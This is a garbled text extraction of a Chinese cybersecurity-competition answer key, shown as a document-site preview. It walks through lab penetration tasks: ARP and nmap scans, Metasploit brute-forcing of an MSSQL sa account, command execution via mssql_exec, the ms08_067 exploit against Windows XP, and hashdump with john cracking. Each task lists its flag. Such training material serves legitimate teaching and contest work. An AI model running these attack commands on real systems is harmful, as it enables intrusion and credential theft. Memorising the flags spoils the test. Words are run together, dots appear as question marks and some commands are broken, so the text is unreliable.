網(wǎng)絡(luò)空間安全競賽單兵滲透試題解析_第1頁
網(wǎng)絡(luò)空間安全競賽單兵滲透試題解析_第2頁
網(wǎng)絡(luò)空間安全競賽單兵滲透試題解析_第3頁
網(wǎng)絡(luò)空間安全競賽單兵滲透試題解析_第4頁
網(wǎng)絡(luò)空間安全競賽單兵滲透試題解析_第5頁
全文預(yù)覽已結(jié)束

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

ARP掃描滲透測試1.11.通過本地PC中滲透測試平臺BT5對服務(wù)器場景serv2003進(jìn)行ARP掃描滲透測試(使用工具arping,發(fā)送請求數(shù)據(jù)包數(shù)量為5個),并將該操作使用命令的參數(shù)字符串作為Flag提交;(16分)完整操作arping-c5 192.168?X?X答案flag-c1.2通過本地PC中滲透測試平臺BT5對服務(wù)器場景serv2003進(jìn)行ARP掃描滲透測試(使用工具arping,發(fā)送請求數(shù)據(jù)包數(shù)量為5個),并將該操作結(jié)果的最后1行,從左邊數(shù)第2個數(shù)字作為Flag提交;(17分)完整操作arping-c5 192.168.X.X答案flag51.3通過本地PC中滲透測試平臺BT5對服務(wù)器場景serv2003行ARP掃描滲透測試(使用工具M(jìn)etasploit中arp_sweep模塊),并將工具M(jìn)etasploit中arp_sweep模塊存放路徑字符串作為Flag(形式:字符串1/字符串2/字符串字符串n)提交;(16分)完整操作msfconsole;searcharp_sweep;答案flag auxiliary/scanner/discovery/arpsweep1.4通過本地PC中滲透測試平臺BT5對服務(wù)器場景serv2003進(jìn)行ARP掃描滲透測試(使用工具M(jìn)etasploit中arp_sweep模塊),假設(shè)目標(biāo)服務(wù)器場景serv2003在線,請將工具M(jìn)etasploit中arp_sweep模塊運(yùn)行顯示結(jié)果的最后1行的最后1個單詞作為Flag提交;(17分)完整操作useauxiliary/scanner/discovery/arp_sweep;showoptions;setrhostsx.x;run/exploit答案flagcompleted1.5通過本地PC中滲透測試平臺BT5對服務(wù)器場景serv2003進(jìn)行ARP掃描滲透測試(使用工具M(jìn)etasploit中arp_sweep模塊),假設(shè)目標(biāo)服務(wù)器場景serv2003在線,請將工具M(jìn)etasploit中arp_sweep模塊運(yùn)行顯示結(jié)果的第1行出現(xiàn)的IP地址右邊的第1個單詞作為Flag提交;(16分)完整操作答案flagappears(呈現(xiàn)一開機(jī))invalid(不能識別一關(guān)機(jī))1.6通過本地PC中滲透測試平臺BT5對服務(wù)器場景serv2003進(jìn)行ARP掃描滲透測試(使用工具M(jìn)etasploit中arp_sweep模塊),假設(shè)目標(biāo)服務(wù)器場景serv2003在線,請將工具M(jìn)etasploit中arp_sweep模塊的運(yùn)行命令字符串作為Flag提交。(18分)完整操作答案flagrun或者exploitMSSQL數(shù)據(jù)庫滲透測試(100分)2.1在本地PC滲透測試平臺BT5中使用zenmap工具掃描服務(wù)器場景serv2003所在網(wǎng)段(例如:172.16.101.0/24)范圍內(nèi)存活的主機(jī)IP地址和指定開放的1433、3306、80端口。并將該操作使用的命令中必須要使用的字符串作為FLAG提交;(10分)完整操作zenmap;目標(biāo)192.168?1?100/24;命令nmap-p1433,3306,80-T4-A-v192?168?1?100/24答案flag-p1433,3306,802.2通過本地PC中滲透測試平臺BT5對服務(wù)器場景serv2003進(jìn)行系統(tǒng)服務(wù)及版本掃描滲透測試,并將該操作顯示結(jié)果中mssql數(shù)據(jù)庫服務(wù)對應(yīng)的服務(wù)端口信息作為FLAG提交;(10分)

完整操作nmap-sV00答案flag1433/tcp2.3在本地PC滲透測試平臺BT5中使用MSF中模塊對其爆破,使用search命令,并將掃描弱口令模塊的名稱作為FLAG提交;(10分)完整操作msfconsole;searchmssql_login;答案flag mssqllogin在上一題的基礎(chǔ)上使用命令調(diào)用該模塊,并查看需要配置的信息(使用showoptions命令),將回顯中需要配置的目標(biāo)地址,密碼使用的猜解字典,線程,賬戶配置參數(shù)的字段作為FLAG提交(之間以英文逗號分隔,例hello,test,..,..);(10分)完整操作showoptions答案flag RHOSTS,PASSFILE,THREADS,USERNAME2.5在msf模塊中配置目標(biāo)靶機(jī)IP地址,將配置命令中的前兩個單詞作為FLAG提交;(10分)完整操作setRHOSTS192.168.X.X答案flagsetRHOSTS2.6登陸靶機(jī)共享,將共享文件夾password里的passwordList.txt下載到攻擊機(jī)BT5本地,在msf模塊中指定密碼字典,字典路徑為/root/passwordList.txt爆破獲取密碼并將得到的密碼作為FLAG提交;(14分)完整操作我們這里做的時候先自己創(chuàng)建字典文件,再爆破。先用vim/root/use.txt創(chuàng)建用戶名字典輸入常見用戶名,admin,administrator,root,toor,sa(每個單詞占一行);再vim/root/pass.txt創(chuàng)建密碼字典,輸入常見密碼,1234,tbb,tbb123,88888,999999,123456(注意字典中必須有一個用戶名和密碼是正確的,才能爆破)msf5auxiliary(scanner/mssql/mssql_login)>setuser_file/root/use.txtuser_file=>/root/use.txtmsf5auxiliary(scanner/mssql/mssql_login)>setpass_file/root/pass.txtpass_file=>/root/pass.txtmsf5auxiliary(scanner/mssql/mssql_login)>run仔細(xì)看結(jié)果LoginSuccessful:為成功的進(jìn)入[-]:1433 -:1433-LOGINFAILED:WORKSTATION\sa:tbb8342tbb(Incorrect:)[+]:1433 -:1433-LoginSuccessful:WORKSTATION\sa:123456[-]:1433 -:1433-LOGINFAILED:WORKSTATION\toor:tbb(Incorrect:)答案flag1234562.7在msf模塊中切換新的滲透模塊,對服務(wù)器場景serv2003進(jìn)行數(shù)據(jù)庫服務(wù)擴(kuò)展存儲過程進(jìn)行利用,將調(diào)用該模塊的命令作為FLAG提交;(14分)完整操作searshmssql_exec答案flag useauxiliary/admin/mssql/mssqlexec2.8在上一題的基礎(chǔ)上,使用第6題獲取到的密碼并進(jìn)行提權(quán),同時使用showoptions命令查看需要的配置,并配置CMD參數(shù)來查看系統(tǒng)用戶,將配置CMD參數(shù)的命令作為FLAG提交;(14分)

完整操作msf5auxiliary(scanner/mssql/mssql_login)>useauxiliary/admin/mssql/mssql_execmsf5auxiliary(admin/mssql/mssql_exec)>showoptionsmsf5auxiliary(admin/mssql/mssql_exec)>setPASSWORD123456PASSWORD=>123456msf5auxiliary(admin/mssql/mssql_exec)>setCMDcmd.exe/cnetuser答案flagsetCMDcmd.exe/cnetuser2.9在利用msf模塊獲取系統(tǒng)權(quán)限并查看目標(biāo)系統(tǒng)的異常(黑客)用戶,并將該用戶作為FLAG提交。(8分)完整操作接上題操作setcmdcmd?exe/c'mdc:\aaaa111';run;可在目標(biāo)機(jī)C盤建立文件夾(通過sql漏洞提權(quán),可執(zhí)行一切操作,可怕)答案flagHacker主機(jī)發(fā)現(xiàn)與信息收集3?1通過本地PC中滲透測試平臺BT5使用fping對服務(wù)器場景serv2003所在網(wǎng)段(例如:172?16?101?0/24)進(jìn)行主機(jī)發(fā)現(xiàn)掃描.并將該操作使用的命令中必須要使用的參數(shù)作為FLAG提交:(12分)完整操作fping-g192.168.x.x答案flag-g3.2通過本地PC中滲透測試平臺BT5使用genlist對服務(wù)器場景serv2003所在網(wǎng)段講行掃描講行主機(jī)存活發(fā)現(xiàn),并將該操作使用的命令中必須要使用的參數(shù)作為FLAG提交:(12分)完整操作 genlist-s192.168.1.*答案flag-s3?3在通過本地PC中滲透測試平臺BT5使用nbtscan對服務(wù)器場景serv2003所在網(wǎng)段進(jìn)搜索掃描,獲取目標(biāo)的MAC地址等信息,并將該操作使用的命令中必須要使用的參數(shù)作為FLAG提交:(12分)完整操作完整操作 nbtscan-r/24答案flag-r3?4假設(shè)服務(wù)器場景serv2O03設(shè)置了防火墻無法進(jìn)行ping檢測,通過PC中滲透測試平臺BT5使用arping檢測主機(jī)連通性掃描(發(fā)送請求數(shù)據(jù)包數(shù)量為4個),并將該操作使用的命令中固定不變的字符串作為FLAG提交:(12分)完整操作 arping-c410答案flagarping-c43?5通過本地PC中滲透測試平臺BT5使用fping對服務(wù)器場景serv2003所在網(wǎng)段進(jìn)行存活性掃描,且要把最終掃描的存活主機(jī)輸出到文件ip?txt中,并將該操作使用的命令中必須要使用的參數(shù)作為FLAG提交(各參數(shù)之間用英文逗號分割,注意題目要求的先后順序,例a,b):(12分)完整操作fping10-g-a-Labc.txt答案flag-g,-a3?6通過本地PC中滲透測試平臺BT5使用nbtscan從第5題的ip.txt文件中讀取IP掃描主機(jī)信息MAC地址等信息,并將該操作使用的命令中固定不變的字符串作為FLAG提交:(12分)完整操作 nbtscan-fip.txt答案flagnbtscan-f3?7通過本地PC中滲透測試平臺BT5使用xprobe2對服務(wù)器場景serv2003進(jìn)行TCP掃描,僅掃描靶機(jī)80,3306端口的開放情況(端口之間以英文格式下逗號分隔),并將該操作使用的命令中固定不變的字符串作為FLAG提交:(12分)完整操作Xprobe2-T80,330610答案flagxprobe2-T80,33063.8過本地PC中滲透測試平臺BT5使用xprobe2對服務(wù)器場景serv2003進(jìn)行UDP掃描,僅掃描靶機(jī)161,162端口的開放情況(端口之間以英文格式下逗號分隔),并將該操作使用的命令中固定不變的字符串作為FLAG提交。(16

分)完整操作xprobe2-U161,16210答案flagxprobe2-U161,162完整操作Windows操作系統(tǒng)滲透測試(100分)L通過本地PC中滲透測試平臺Kali對服務(wù)器場景BJST進(jìn)行操作系統(tǒng)掃描滲透測試,并將該操作顯示結(jié)果“Running:”之后的字符串作為FLAG提交;(6分)完整操作nmap-sV-O192.168.x.x答案flagMicrosoftWindowsXP4.2通過本地PC中滲透測試平臺Kali對服務(wù)器場景BJST進(jìn)行系統(tǒng)服務(wù)及版本掃描滲透測試,并將該操作顯示結(jié)果中445端口對應(yīng)的服務(wù)版本信息字符串作為FLAG提交;(6分)完整操作nmap-sV-O192.168.x.x答案flagMicrosoftWindowsXPmicrosoft-ds4.3通過本地PC中滲透測試平臺Kali對服務(wù)器場景BJST進(jìn)行滲透測試,將該場景網(wǎng)絡(luò)連接信息中的DNS信息作為FLAG提交;(例如14)(13分)完整操作msfconsole;useexploit/windows/smb/ms08_067_netapi;setrhostsx.x;run;shell;ipconfig/all答案flag64.4通過本地PC中滲透測試平臺Kali對服務(wù)器場景BJST進(jìn)行滲透測試,將該場景桌面上111文件夾中唯 個后綴為.docx文件的文件名稱作為FLAG提交;(14分)完整操作:在XP桌面222下新建015935f97dc60c9818cbda280e23e1a3b693d67d.docx文件,內(nèi)容52d7b44f256e6431e9b9248884294d13c6c38c12接上題Kalimsf;shell;C:\DocumentsandSettings'Administrator\Desktop\111;dir答案flag015935f97dc60c9818cbda280e23e1a3b693d67d4.5完整操作接上題kali操作;exit到meterpreter>;cdc:/;ls;cd"DocumentsandSettings";ls;cd Administrator;ls;cd Desktop;ls;cd 111;ls;download015935f97dc60c9818cbda280e23e1a3b693d67d.docx ./;打開新終端ls;vim015935f97dc60c9818cbda280e23e1a3b693d67d.docx;復(fù)制文件內(nèi)容答案flag52d7b44f256e6431e9b9248884294d13c6c38c124.6完整操作:在XP桌面222下新建圖像文件,圖像中輸入SecurityLife;接上題Kalimsf操作;cd?./;cd222;ls;download222.bmp./;點(diǎn)kali窗口位置主文件夾,雙擊圖像文件答案flagSecurityLife4.7通過本地PC中滲透測試平臺Kali對服務(wù)器場景BJST進(jìn)行滲透測試,將該場景中的當(dāng)前最高賬戶管理員的密碼作為FLAG提交;(10分)完整操作 接上題meterpreter>hashdump(復(fù)制帳號及密碼);vim新建pass.txt(編輯菜單下粘貼);john--format=NT./pass.txt

答案flag答案flagtoor1234.8通過本地PC中滲透測試平臺Kali對服務(wù)器場景BJST進(jìn)行滲透測試,將該場景中回收站內(nèi)文件的文檔內(nèi)容作為FLAG提交。(20分)完整操作答案flag089f4e36079ef2742d5efc7def5a5bf5768f6c6e5Linux操作系統(tǒng)滲透測試5.1通過本地PC中滲透測試平臺Kali對服務(wù)器場景CentOS5.5進(jìn)行操作系統(tǒng)掃描滲透測試,并將該操作顯示結(jié)果“OSDetails:”之后的字符串作為FLAG提交;(6分)完整操作nmap-Oip答案flagLinux2.6.9-2.6.305.2通過本地PC中滲透測試平臺Kali對服務(wù)器場景CentOS5.5進(jìn)行系統(tǒng)服務(wù)及版本掃描滲透測試,并將該操作顯示結(jié)果中MySQL數(shù)據(jù)庫對應(yīng)的服務(wù)版本信息字符串作為FLAG提交;(6分)完整操作在centos中安裝mysqlyum-yinstall mysqlmysql-servermysql-devel;開戶服務(wù)servicemysqldstart;關(guān)閉防火墻setenforce0;iptables-FKalinamp-O-sVIP地址答案flagMySQL5.0.775.3.通過本地PC中滲透測試平臺Kali對服務(wù)器場景CentOS5.5進(jìn)行滲透測試,將該場景/var/www/html目錄中唯一一個后綴為.html文件的文件名稱作為FLAG提交;(12分)完整操作CentOS開mysq遠(yuǎn)程訪問,詳細(xì)設(shè)置請看"CentOS下的

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論